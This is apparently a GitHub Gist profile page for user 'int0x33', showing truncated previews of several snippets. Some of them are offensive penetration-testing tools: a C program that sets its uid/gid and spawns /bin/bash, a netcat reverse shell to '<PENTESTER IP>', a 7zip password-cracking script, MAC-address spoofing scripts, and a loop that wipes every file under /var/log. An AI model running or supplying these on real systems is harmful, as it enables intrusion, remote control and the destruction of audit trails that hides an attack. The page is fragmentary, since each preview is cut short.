Skip to content

Instantly share code, notes, and snippets.

View int0x33's full-sized avatar
🎯
Focusing

ZER0 int0x33

🎯
Focusing
View GitHub Profile
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main()
{
setresuid(996, 996, 996);
setresgid(996, 996, 996);
system( "/bin/bash" );
#!/bin/bash
nc <PENTESTER IP> 9999 -e /bin/bash
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
#include <fcntl.h>
int main(int argc, char **argv, char **envp)
{
char buf[1024];
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>submit demo</title>
<style>
p {
margin: 0;
color: blue;
}
module.exports = {
consumer_key: '',
consumer_secret: '',
access_token: '',
access_token_secret: ''
}
// Our Twitter library
var Twit = require('twit');
var T = new Twit(require('./config.js'));
function datestring () {
var d = new Date(Date.now() - 5*60*60*1000); //est timezone
return d.getUTCFullYear() + '-'
+ (d.getUTCMonth() + 1) + '-'
+ d.getDate();
};
#!/bin/bash
# 7zip-JTR Decrypt Script
#
# Clone of JTR Decrypt Scripts by synacl modified for 7zip
# - RAR-JTR Decrypt Script - https://synacl.wordpress.com/2012/02/10/using-john-the-ripper-to-crack-a-password-protected-rar-archive/
# - ZIP-JTR Decrypt Script - https://synacl.wordpress.com/2012/08/18/decrypting-a-zip-using-john-the-ripper/
echo "7zip-JTR Decrypt Script";
if [ $# -ne 2 ]
then
description "change mac addresses"
start on starting network-manager
pre-start script
/usr/bin/macchanger -A eth0
end script
#!/bin/sh
MACCHANGER=/usr/bin/macchanger
[ "$IFACE" != "lo" ] || exit 0
# Bring down interface (for wireless cards that are up to scan for networks), change MAC address to a random vendor address, bring up the interface
/sbin/ifconfig "$IFACE" down
macchanger -A "$IFACE"
function clearlogs {
find /var/log -type f
}
for i in return $(clearlogs);
do sudo cat /dev/null > $i;
echo "Log $i has been cleared";
done